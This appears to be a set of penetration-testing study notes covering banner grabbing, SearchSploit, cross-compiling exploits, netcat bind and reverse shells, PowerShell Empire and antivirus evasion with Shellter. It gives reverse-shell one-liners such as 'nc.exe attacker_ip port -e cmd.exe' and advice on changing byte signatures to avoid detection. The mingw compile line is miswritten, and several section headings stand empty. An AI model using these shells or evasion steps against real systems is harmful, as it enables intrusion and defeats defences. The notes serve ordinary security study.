


nmap script banner.nse

nc ip port : banner grabbing

Searching exploits

ExploitDB : Rapid7 DB :

The Exploit-db offline database of exploits can be accessed and queried with a tool called SearchSploit. Update exploitdb periodically. Use searchsploit -u to update database.

searchsploit “search term” -c : case sensitive search -e : Exact search -w : URL path of exploit -m : copy exploit to current directory using id

Exploit code downloaded needs to be verified. Exploit code needs to prepared for per case by changing IP and Port for attacker and satisfy requirements asked for exploit.

Cross Compiling Exploits

In certain cases, exploit code will be developed in C/C++/C#, as a result, you will need to compile the exploit code in to a PE (Portable Executable) or binary.


Install gcc and mingw-w64 x64 : 1686-w64-mingw32-gcc exploit_id.c -o exploit x86 : 1686-w64-mingw32-gcc exploit_id.c -o exploit -lws2_32

pre-compiled binary exploits :


Netcat (Aka TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.

Netcat can be used by penetration testers to perform the following functionality:


nc ip port : Connect to specified IP and Port nc -lp port : Setup listener -u : UDP port -l : listener -n : no DNS resolution -e : Execute specified command -c : Shell command

/usr/share/windows-binaries/ to get compiled binaries for windows

Bind & Reverse Shell


Read Reverse_and_Bind_shell.

A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.

attacker > nc victim_ip port

victim > nc.exe -lvp port -e cmd.exe

A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

attacker > nc -lvp port

victim > nc.exe attacker_ip port -e cmd.exe

PayloadsAllTheThings : Reverse shell generator :

Powershell Empire

PowerShell-Empire (Aka Empire) is a pure PowerShell exploitation/postexploitation framework built on cryptological-secure communications and flexible architecture.

Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from keyloggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

In addition to being updated and modernized, BC Security, the company responsible for maintaining the Empire has also developed a companion to Empire called Starkiller.


FTP , php , smb , mysql


FTP , PHP , Samba

AV Evasion

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. – MITR

AV software will typically utilize signature, heuristic and behaviour based detection.

  1. Signature based detection - An AV signature is a unique sequence of bytes that uniquely identifies malware. As a result, you will have to ensure that your obfuscated exploit or payload doesn’t match any known signature in the AV database. We can bypass signature-based detection by modifying the malware’s byte sequence, therefore changing the signature.
  2. Heuristic-based detection - Relies on rules or decisions to determine whether a binary is malicious. It also looks for specific patterns within the code or program calls.
  3. Behavior based detection - Relies on identifying malware by monitoring it’s behavior. (Used for newer strains of malware)

AV Evasion Techniques

On-disk Evasion Techniques

In-Memory Evasion Techniques


install shelter and wine32 /usr/share/windows-resources/shellter/shelter.exe
